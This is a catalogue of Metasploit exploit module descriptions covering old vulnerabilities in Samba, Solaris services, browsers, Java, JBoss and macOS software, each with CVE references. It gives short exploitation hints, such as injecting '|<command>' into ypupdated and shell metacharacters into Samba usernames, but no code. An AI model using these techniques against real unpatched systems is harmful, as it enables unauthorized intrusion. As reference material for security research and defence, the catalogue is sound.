The Madwifi driver under Linux is vulnerable to a remote kernel-mode stack-based buffer overflow. The vulnerability is triggered by one of these properly crafted information elements: WPA, RSN, WME and Atheros OUI. The current madwifi driver (0.9.2) and all madwifi-ng drivers since r1504 are vulnerable; the Madwifi 0.9.2.1 release corrects the issue. This module has been tested against Ubuntu 6.10 and is 100% reliable, doesn't crash the Wifi stack and can exploit the same machine multiple times without the need to reboot it. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information. CVE-2006-6332 OSVDB-31267 http://www.madwifi.org

GLD (Greylisting Daemon) Postfix Buffer Overflow
This module exploits a stack buffer overflow in the Salim Gasmi GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten. CVE-2005-1099 OSVDB-15492 BID-13129 http://www.milw0rm.com/exploi...

hplip hpssd.py From Address Arbitrary Command Execution
This module exploits a command execution vulnerability in the hpssd.py daemon of the Hewlett-Packard Linux Imaging and Printing Project. According to MITRE, versions 1.x and 2.x before 2.7.10 are vulnerable. This module was written and tested using the Fedora 6 Linux distribution. On the test system, the daemon listens on localhost only and runs with root privileges. Although the configuration shows the daemon is to listen on port 2207, it actually listens on a dynamic port. NOTE: If the target system does not have a 'sendmail' command installed, this vulnerability cannot be exploited. CVE-2007-5208 OSVDB-41693 BID-26054 https://bugzilla.redhat.com/s... https://bugzilla.redhat.com/a...

Borland InterBase INET_connect() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request. CVE-2007-5243 OSVDB-38605 BID-25917 http://www.risesecurity.org/a...

Borland InterBase jrd8_create_database() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request. CVE-2007-5243 OSVDB-38606 BID-25917 http://www.risesecurity.org/a...

Borland InterBase open_marker_file() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request. CVE-2007-5244 OSVDB-38610 BID-25917 http://www.risesecurity.org/a...

Borland InterBase PWD_db_aliased() Buffer Overflow
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request. CVE-2007-5243 OSVDB-38607 BID-25917 http://www.risesecurity.org/a...

LPRng use_syslog Remote Format String Vulnerability
This module exploits a format string vulnerability in the LPRng print server. This vulnerability was discovered by Chris Evans. There was a publicly circulating worm targeting this vulnerability, which prompted RedHat to pull their 7.0 release. They consequently re-released it as "7.0-respin". CVE-2000-0917 OSVDB-421 BID-1712 US-CERT-VU-382365 http://www.cert.org/advisorie... https://bugzilla.redhat.com/s... http://www.exploit-db.com/exp... http://www.exploit-db.com/exp... http://www.exploit-db.com/exp...

MySQL yaSSL CertDecoder::GetName Buffer Overflow
This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier) implementation bundled with MySQL. By sending a specially crafted client certificate, an attacker can execute arbitrary code. This vulnerability is present within the CertDecoder::GetName function inside "taocrypt/src/asn.cpp". However, the stack buffer that is written to exists within a parent function's stack frame. NOTE: This vulnerability requires a non-default configuration. First, the attacker must be able to pass the host-based authentication. Next, the server must be configured to listen on an accessible network interface. Lastly, the server must have been manually configured to use SSL. The binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing on Windows XP SP3, these protections successfully prevented exploitation. Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary package were not exploitable due to the use of the compiler's FORTIFY feature. Although suse11 was mentioned in the original blog post, the binary package they provide does not contain yaSSL or support SSL. CVE-2009-4484 BID-37640 BID-37943 BID-37974 OSVDB-61956 http://secunia.com/advisories... http://intevydis.blogspot.com...

MySQL yaSSL SSL Hello Message Buffer Overflow
This module exploits a stack buffer overflow in the yaSSL (1.7.5 and earlier) implementation bundled with MySQL <= 6.0. By sending a specially crafted Hello packet, an attacker may be able to execute arbitrary code. CVE-2008-0226 OSVDB-41195 BID-27140

Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
This exploit takes advantage of a stack based overflow. Once the stack corruption has occurred it is possible to overwrite a pointer which is later used for a memcpy. This gives us a write anything anywhere condition similar to a format string vulnerability. NOTE: The popsubfolders option is a non-default setting. I chose to overwrite the GOT with my shellcode and return to it. This defeats the VA random patch and possibly other stack protection features. Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with a version containing the vulnerable code, it is not exploitable due to the use of the FORTIFY_SOURCE compiler enhancement. CVE-2006-2502 OSVDB-25853 BID-18056 http://www.exploit-db.com/exp... http://www.exploit-db.com/exp... http://archives.neohapsis.com...

Poptop Negative Read Overflow
This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I currently do not have a good way to detect Poptop versions. The server will by default only allow 4 concurrent manager processes (what we run our code in), so you could have a max of 4 shells at once. Using the current method of exploitation, our socket will be closed before we have the ability to run code, preventing the use of Findsock. CVE-2003-0213 OSVDB-3293 http://securityfocus.com/arch... http://www.freewebs.com/bligh...

Squid NTLM Authenticate Overflow
This is an exploit for Squid's NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user controlled data of a user defined length. Props to iDEFENSE for the advisory. CVE-2004-0541 OSVDB-6791 http://www.idefense.com/appli... BID-10500

Samba chain_reply Memory Corruption (Linux x86)
This exploits a memory corruption vulnerability present in Samba versions prior to 3.3.13. When handling chained response packets, Samba fails to validate the offset value used when building the next part. By setting this value to a number larger than the destination buffer size, an attacker can corrupt memory. Additionally, setting this value to a value smaller than 'smb_wct' (0x24) will cause the header of the input buffer chunk to be corrupted. After close inspection, it appears that 3.0.x versions of Samba are not exploitable. Since they use an "InputBuffer" size of 0x20441, an attacker cannot cause memory to be corrupted in an exploitable way. It is possible to corrupt the heap header of the "InputBuffer", but it didn't seem possible to get the chunk to be processed again prior to process exit. In order to gain code execution, this exploit attempts to overwrite a "talloc chunk" destructor function pointer. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the nx memory protection. NOTE: It is possible to make exploitation attempts indefinitely since Samba forks for user sessions in the default configuration. CVE-2010-2063 OSVDB-65518 http://labs.idefense.com/inte...

Samba lsa_io_trans_names Heap Overflow
This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. Additionally, this module will not work when the Samba "log level" parameter is higher than "2". CVE-2007-2446 OSVDB-34699

Samba trans2open Overflow (Linux x86)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC. CVE-2003-0201 OSVDB-4469 BID-7294 http://seclists.org/bugtraq/2...

Firefox 3.5 escape() Return Value Memory Corruption
This module exploits a memory corruption vulnerability in the Mozilla Firefox browser. This flaw occurs when a bug in the javascript interpreter fails to preserve the return value of the escape() function and results in uninitialized memory being used instead. This module has only been tested on Windows, but should work on other platforms as well with the current targets. CVE-2009-2477 OSVDB-55846 BID-35660 https://bugzilla.mozilla.org/...

Firefox location.QueryInterface() Code Execution
This module exploits a code execution vulnerability in the Mozilla Firefox browser. To reliably exploit this vulnerability, we need to fill almost a gigabyte of memory with our nop sled and payload. This module has been tested on OS X 10.3 with the stock Firefox 1.5.0 package. CVE-2006-0295 OSVDB-22893 BID-16476 http://www.mozilla.org/securi...

Apple OS X iTunes 8.1.1 ITMS Overflow
This module exploits a stack-based buffer overflow in iTunes itms:// URL parsing. It is accessible from the browser, and in Safari itms URLs will be opened in iTunes automatically. Because iTunes is multithreaded, only vfork-based payloads should be used. CVE-2009-0950 OSVDB-54833 http://support.apple.com/kb/H... http://redpig.dataspill.org/2...

Sun Java Calendar Deserialization Exploit
This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected). CVE-2008-5353 OSVDB-50500 http://slightlyrandombrokenth... http://landonf.bikemonkey.org... http://blog.cr0.org/2009/05/w... http://sunsolve.sun.com/searc...

Sun Java JRE getSoundbank file:// URI Buffer Overflow
This module exploits a flaw in the getSoundbank function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The affected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested. CVE-2009-3867 OSVDB-59711 BID-36881 http://zerodayinitiative.com/...

Sun Java JRE AWT setDiffICM Buffer Overflow
This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The affected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested. CVE-2009-3869 OSVDB-59710 BID-36881 http://sunsolve.sun.com/searc... http://www.zerodayinitiative....

Signed Applet Social Engineering Code Exec
This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it to a .jar file, then signs the .jar with a dynamically created certificate containing values of your choosing. This is presented to the end user via a web page with an applet tag, loading the signed applet. The user's JVM pops a dialog asking if they trust the signed applet and displays the values chosen. Once the user clicks 'accept', the applet executes with full user permissions. The java payload used in this exploit is derived from Stephen Fewer's and HDM's payload created for the CVE-2008-5353 java deserialization exploit. This module requires the rjb rubygem, the JDK, and the $JAVA_HOME variable to be set. If these dependencies are not present, the exploit falls back to a static, signed JAR. http://www.defcon.org/images/...

Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff's HTML PoC. CVE-2005-2265 OSVDB-17968 BID-14242 http://www.mozilla.org/securi...

Mozilla Suite/Firefox Navigator Object Code Execution
This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed. CVE-2006-3677 OSVDB-27559 BID-19192 http://www.mozilla.org/securi... http://browserfun.blogspot.co...

Opera 9 Configuration Overwrite
Opera web browser in versions <= 9.10 allows unrestricted script access to its configuration page, opera:config, allowing an attacker to change settings and potentially execute arbitrary code. OSVDB-66472

Opera historysearch XSS
Certain constructs are not escaped correctly by Opera's History Search results. These can be used to inject scripts into the page, which can then be used to modify configuration settings and execute arbitrary commands. Affects Opera versions between 9.50 and 9.61. CVE-2008-4696 OSVDB-49472 BID-31869 http://www.opera.com/support/...

Apple QTJava toQTPointer() Arbitrary Memory Access
This module exploits an arbitrary memory access vulnerability in the Quicktime for Java API provided with Quicktime 7. CVE-2007-2175 OSVDB-34178 BID-23608 http://www.zerodayinitiative....

Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a specially crafted pdf that contains malformed U3D data, an attacker may be able to execute arbitrary code. CVE-2009-2990 OSVDB-58920 BID-36665 http://sites.google.com/site/... http://www.adobe.com/support/...

Maple Maplet File Creation and Command Execution
This module harnesses Maple's ability to create files and execute commands automatically when opening a Maplet. All versions up to 13 are suspected vulnerable. Testing was conducted with version 13 on Windows. Standard security settings prevent code from running in a normal Maple worksheet without user interaction, but those settings do not prevent code in a Maplet from running. In order for the payload to be executed, an attacker must convince someone to open a specially modified .maplet file with Maple. By doing so, an attacker can execute arbitrary code as the victim user. OSVDB-64541 http://www.maplesoft.com/prod...

PeaZip <= 2.6.1 Zip Processing Command Injection
This module exploits a command injection vulnerability in PeaZip. All versions prior to 2.6.2 are suspected vulnerable. Testing was conducted with version 2.6.1 on Windows. In order for the command to be executed, an attacker must convince someone to open a specially crafted zip file with PeaZip and then open the contained file by double-clicking it. By doing so, an attacker can execute arbitrary commands as the victim user. CVE-2009-2261 OSVDB-54966 http://peazip.sourceforge.net/ http://www.exploit-db.com/exp...

wu-ftpd SITE EXEC/INDEX Format String Vulnerability
This module exploits a format string vulnerability in versions of the Washington University FTP server older than 2.6.1. By executing specially crafted SITE EXEC or SITE INDEX commands containing format specifiers, an attacker can corrupt memory and execute arbitrary code. CVE-2000-0573 OSVDB-11805 BID-1387

Generic Payload Handler
This module is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.

JBoss JMX Console Beanshell Deployer WAR upload and deployment
This module can be used to install a WAR file payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:BSHDeployer's createScriptDeployment() method. CVE-2010-0738 http://www.redteam-pentesting...

JBoss Java Class DeploymentFileRepository WAR deployment
This module uses the DeploymentFileRepository class in JBoss Application Server (jbossas) to deploy a JSP file in a minimal WAR context. CVE-2010-0738 http://www.redteam-pentesting...

JBoss JMX Console Deployer Upload and Execute
This module can be used to execute a payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:MainDeployer functionality. To accomplish this, a temporary HTTP server is created to serve a WAR archive containing our payload. This method will only work if the target server allows outbound connections to us. CVE-2007-1036 CVE-2010-0738 OSVDB-33744 http://www.redteam-pentesting...

Sun Java System Web Server WebDAV OPTIONS Buffer Overflow
This module exploits a buffer overflow in Sun Java Web Server prior to version 7 Update 8. By sending an "OPTIONS" request with an overly long path, attackers can execute arbitrary code. In order to reach the vulnerable code, the attacker must also specify the path to a directory with WebDAV enabled. This exploit was tested and confirmed to work on Windows XP SP3 without DEP. Versions for other platforms are vulnerable as well. The vulnerability was originally discovered and disclosed by Evgeny Legerov of Intevydis. CVE-2010-0361 OSVDB-61851 http://intevydis.blogspot.com... http://sunsolve.sun.com/searc...

Apache Tomcat Manager Application Deployer Upload and Execute
This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. CVE-2009-3843 OSVDB-60317 CVE-2009-4189 OSVDB-60670 CVE-2009-4188 CVE-2009-3548 OSVDB-60176 BID-36954 http://tomcat.apache.org/tomc...

HP OpenView OmniBack II Command Execution
This module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module. For Microsoft Windows targets, due to module limitations, use the "unix/cmd/generic" payload and set CMD to your command. You can only pass a small amount of characters (4) to the command line on Windows. CVE-2001-0311 OSVDB-6018 BID-11032 http://www.securiteam.com/exp...

VERITAS NetBackup Remote Command Execution
This module allows arbitrary command execution on an ephemeral port opened by Veritas NetBackup, whilst an administrator is authenticated. The port is opened and allows direct console access as root or SYSTEM from any source address. CVE-2004-1389 OSVDB-11026 BID-11494 http://seer.support.veritas.c...

Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug was found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue. CVE-2010-0304 OSVDB-61987 BID-37985 http://www.wireshark.org/secu... http://anonsvn.wireshark.org/...

Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug was found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue. This version loops, sending the packet every X seconds until the job is killed. CVE-2010-0304 OSVDB-61987 BID-37985 http://www.wireshark.org/secu... http://anonsvn.wireshark.org/...

NTP daemon readvar Buffer Overflow
This module exploits a stack-based buffer overflow in the ntpd and xntpd service. By sending an overly long 'readvar' request it is possible to execute code remotely. As the stack is corrupted, this module uses the Egghunter technique. CVE-2001-0414 OSVDB-805 BID-2540 US-CERT-VU-970472

PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)
This module exploits an integer overflow vulnerability in the unserialize() function of the PHP web server extension. This vulnerability was patched by Stefan in version 4.5.0 and applies to all previous versions supporting this function. This particular module targets numerous web applications and is based on the proof of concept provided by Stefan Esser. This vulnerability requires approximately 900k of data to trigger due to the multiple Cookie headers requirement. Since we are already assuming a fast network connection, we use a 2Mb block of shellcode for the brute force, allowing quick exploitation for those with fast networks. One of the neat things about this vulnerability is that on x86 systems, the EDI register points into the beginning of the hashtable string. This can be used with an egghunter to quickly exploit systems where the location of a valid "jmp EDI" or "call EDI" instruction is known. The EDI method is faster, but the bandwidth-intensive brute force used by this module is more reliable across a wider range of systems. CVE-2007-1286 OSVDB-32771 http://www.php-security.org/M...

RealServer Describe Buffer Overflow
This module exploits a buffer overflow in RealServer 7/8/9 and was based on Johnny Cyberpunk's THCrealbad exploit. This code should reliably exploit Linux, BSD, and Windows-based servers. CVE-2002-1643 OSVDB-4468 http://lists.immunitysec.com/...

Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
This module attempts to exploit a buffer overflow vulnerability present in versions 2.2.2 through 2.2.6 of Samba. The Samba developers report this as: "Bug in the length checking for encrypted password change requests from clients." The bug was discovered and reported by the Debian Samba Maintainers. CVE-2003-0085 OSVDB-6323 BID-7106 http://www.samba.org/samba/hi...

Samba "username map script" Command Execution
This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell metacharacters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication! CVE-2007-2447 OSVDB-34700 BID-23972 http://labs.idefense.com/inte... http://samba.org/samba/securi...

Subversion Date Svnserve
This is an exploit for the Subversion date parsing overflow. This exploit is for the svnserve daemon (svn:// protocol) and will not work for Subversion over webdav (http[s]://). This exploit should never crash the daemon, and should be safe to do multi-hits. **WARNING** This exploit seems to (not very often, I've only seen it during testing) corrupt the subversion database, so be careful! CVE-2004-0397 OSVDB-6301 BID-10386 http://lists.netsys.com/piper... MIL-68

Wyse Rapport Hagent Fake Hserver Command Execution
This module exploits the Wyse Rapport Hagent service by pretending to be a legitimate server. This process involves starting both HTTP and FTP services on the attacker side, then contacting the Hagent service of the target and indicating that an update is available. The target will then download the payload wrapped in an executable from the FTP service. CVE-2009-0695 OSVDB-55839 US-CERT-VU-654545 http://snosoft.blogspot.com/ http://www.theregister.co.uk/... http://www.wyse.com/servicean... http://www.wyse.com/servicean...

Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow
This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver. Since the driver runs in the kernel space, a failed exploit attempt can cause the OS to reboot. CVE-2005-2852 OSVDB-12790

AppleFileServer LoginExt PathName Overflow
This module exploits a stack buffer overflow in the AppleFileServer service on MacOS X. This vulnerability was originally reported by Atstake and was actually one of the few useful advisories ever published by that company. You only have one chance to exploit this bug. This particular exploit uses a stack-based return address that will only work under optimal conditions. CVE-2004-0430 OSVDB-5762 BID-10271

Arkeia Backup Client Type 77 Overflow (Mac OS X)
This module exploits a stack buffer overflow in the Arkeia backup client for the Mac OS X platform. This vulnerability affects all versions up to and including 5.3.3 and has been tested with Arkeia 5.3.1 on Mac OS X 10.3.5. CVE-2005-0491 OSVDB-14011 BID-12594 http://lists.netsys.com/piper...

iPhone MobileSafari LibTIFF Buffer Overflow
This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload. CVE-2006-3459 OSVDB-27723 BID-19283

Safari Archive Metadata Command Execution
This module exploits a vulnerability in Safari's "Safe file" feature, which will automatically open any file with one of the allowed extensions. This can be abused by supplying a zip file, containing a shell script, with a metafile indicating that the file should be opened by Terminal.app. This module depends on the 'zip' command-line utility. CVE-2006-0848 OSVDB-23510 BID-16736

Apple OS X Software Update Command Execution
This module exploits a feature in the Distribution Packages, which are used in the Apple Software Update mechanism. This feature allows for arbitrary command execution through JavaScript. This exploit provides the malicious update server. Requests must be redirected to this server by other means for this exploit to work. CVE-2007-5863 OSVDB-40722

Mail.app Image Attachment Command Execution
This module exploits a command execution vulnerability in the Mail.app application shipped with Mac OS X 10.5.0. This flaw was patched in 10.4 in March of 2007, but reintroduced into the final release of 10.5. CVE-2006-0395 CVE-2007-6165 OSVDB-40875 BID-26510 BID-16907

iPhone MobileMail LibTIFF Buffer Overflow
This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload. CVE-2006-3459 OSVDB-27723 BID-19283

WebSTAR FTP Server USER Overflow
This module exploits a stack buffer overflow in the logging routine of the WebSTAR FTP server. Reliable code execution is obtained by a series of hops through the System library. CVE-2004-0695 OSVDB-7794 BID-10720

MacOS X EvoCam HTTP GET Buffer Overflow
This module exploits a stack buffer overflow in the web server provided with the EvoCam program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6, 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability. CVE-2010-2309 OSVDB-65043 http://www.exploit-db.com/exp...

Mac OS X mDNSResponder UPnP Location Overflow
TODO

UFO: Alien Invasion IRC Client Buffer Overflow Exploit
This module exploits a buffer overflow in the IRC client component of UFO: Alien Invasion 2.2.1. CVE-2010-2309 OSVDB-65689 http://www.exploit-db.com/exp...

MacOS X QuickTime RTSP Content-Type Overflow
No module description CVE-2007-6166 OSVDB-40876 BID-26549

Samba lsa_io_trans_names Heap Overflow
This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the szone_free() to overwrite the size() or free() pointer in initial_malloc_zones structure. CVE-2007-2446 OSVDB-34699

Samba trans2open Overflow (Mac OS X PPC)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems. CVE-2003-0201 OSVDB-4469 BID-7294 http://seclists.org/bugtraq/2...

Solaris dtspcd Heap Overflow
This is a port of noir's dtspcd exploit. This module should work against any vulnerable version of Solaris 8 (sparc). The original exploit code was published in the book Shellcoder's Handbook. CVE-2001-0803 OSVDB-4503 BID-3517 http://www.cert.org/advisorie... http://media.wiley.com/produc...

Solaris LPD Command Execution
This module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Sun Solaris up to and including 8.0. This module uses a technique discovered by Dino Dai Zovi to exploit the flaw without needing to know the resolved name of the attacking system. CVE-2001-1583 OSVDB-15131 BID-3274

Samba lsa_io_trans_names Heap Overflow
This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. Additionally, this module will not work when the Samba "log level" parameter is higher than "2". CVE-2007-2446 OSVDB-34699

Samba trans2open Overflow (Solaris SPARC)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on Solaris SPARC systems that do not have the noexec stack option set. Big thanks to MC and valsmith for resolving a problem with the beta version of this module. CVE-2003-0201 OSVDB-4469 BID-7294 http://seclists.org/bugtraq/2...

Sun Solaris sadmind adm_build_path() Buffer Overflow
This module exploits a buffer overflow vulnerability in adm_build_path() function of sadmind daemon. The distributed system administration daemon (sadmind) is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received. The sadmind daemon process continues to run for 15 minutes after the last request is completed, unless a different idle-time is specified with the -i command line option. The sadmind daemon may be started independently from the command line, for example, at system boot time. In this case, the -i option has no effect; sadmind continues to run, even if there are no active requests. CVE-2008-4556 OSVDB-49111 http://risesecurity.org/advis...

Solaris sadmind Command Execution
This exploit targets a weakness in the default security settings of the sadmind RPC application. This server is installed and enabled by default on most versions of the Solaris operating system. Vulnerable systems include Solaris 2.7, 8, and 9. CVE-2003-0722 OSVDB-4585 BID-8615 http://lists.insecure.org/lis...

Solaris ypupdated Command Execution
This exploit targets a weakness in the way the ypupdated RPC application uses the command shell when handling a MAP UPDATE request. Extra commands may be launched through this command shell, which runs as root on the remote host, by passing commands in the format '|<command>'. Vulnerable systems include Solaris 2.7, 8, 9, and 10, when ypupdated is started with the '-i' command-line option. CVE-1999-0209 OSVDB-11517 BID-1749

Sun Solaris Telnet Remote Authentication Bypass Vulnerability
This module exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11. CVE-2007-0882 OSVDB-31881 BID-22512

Solaris in.telnetd TTYPROMPT Buffer Overflow
This module uses a buffer overflow in the Solaris 'login' application to bypass authentication in the telnet daemon. CVE-2001-0797 OSVDB-690 BID-5531

Internal Aggressive Test Exploit
This module tests the exploitation of a test service.

Command Stager Web Test
This module tests the command stager mixin against a shell.jsp application installed on an Apache Tomcat server.

Test Dialup Exploit
This exploit connects to a system's modem over dialup and provides the user with a readout of the login banner.

MIPS Aggressive Test Exploit
This module tests the exploitation of a test service

Internal Kernel-mode Test Exploit
This module tests the exploitation of a kernel-mode test service.

ContentKeeper Web Remote Command Execution
This module exploits the ContentKeeper Web Appliance. Versions prior to 125.10 are affected. This module exploits a combination of weaknesses to enable remote command execution as the Apache user. Following exploitation it is possible to abuse an insecure PATH call to 'ps' etc. in the setuid 'benetool' to escalate to root. OSVDB-54551 OSVDB-54552 http://www.aushack.com/200904...

UnrealIRCD 3.2.8.1 Backdoor Command Execution
This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. CVE-2010-2075 OSVDB-65445 http://www.unrealircd.com/txt...

DistCC Daemon Command Execution
This module uses a documented security weakness to execute arbitrary commands on any system running distccd. CVE-2004-2687 OSVDB-13378 http://distcc.samba.org/secur...

SpamAssassin spamd Remote Command Execution
This module exploits a flaw in the SpamAssassin spamd service by specifying a malicious vpopmail User header, when running with vpopmail and paranoid modes enabled (non-default). Versions prior to v3.1.3 are vulnerable. CVE-2006-2447 OSVDB-26177 BID-18290 http://spamassassin.apache.or...

Zabbix Agent net.tcp.listen Command Injection
This module exploits a metacharacter injection vulnerability in the FreeBSD and Solaris versions of the Zabbix agent. This flaw can only be exploited if the attacker can hijack the IP address of an authorized server (as defined in the configuration file). CVE-2009-4502 OSVDB-60956 https://support.zabbix.com/br...

ClamAV Milter Blackhole-Mode Remote Code Execution
This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter' (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable. When implemented with black hole mode enabled, it is possible to execute commands remotely due to an insecure popen call. CVE-2007-4560 OSVDB-36909 BID-25439 http://www.milw0rm.com/exploi...

AWStats configdir Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 are vulnerable. CVE-2005-0116 OSVDB-13002 BID-12298 http://www.idefense.com/appli...

AWStats migrate Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based payloads are recommended with this module. The vulnerability is only present when AllowToUpdateStatsFromBrowser is enabled in the AWstats configuration file (non-default). CVE-2006-2237 OSVDB-25284 BID-17844 http://awstats.sourceforge.ne... http://www.milw0rm.com/exploi...

Barracuda IMG.PL Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable. CVE-2005-2847 OSVDB-19279 BID-14712 NSS-19556 http://www.securiweb.net/wiki...

BASE base_qry_common Remote File Include
This module exploits a remote file inclusion vulnerability in the base_qry_common.php file in BASE 1.2.4 and earlier. CVE-2006-2685 OSVDB-49366 BID-18298

Cacti graph_view.php Remote Command Execution
This module exploits an arbitrary command execution vulnerability in the Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to 0.8.6-d are vulnerable. OSVDB-17539 BID-14042

Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution
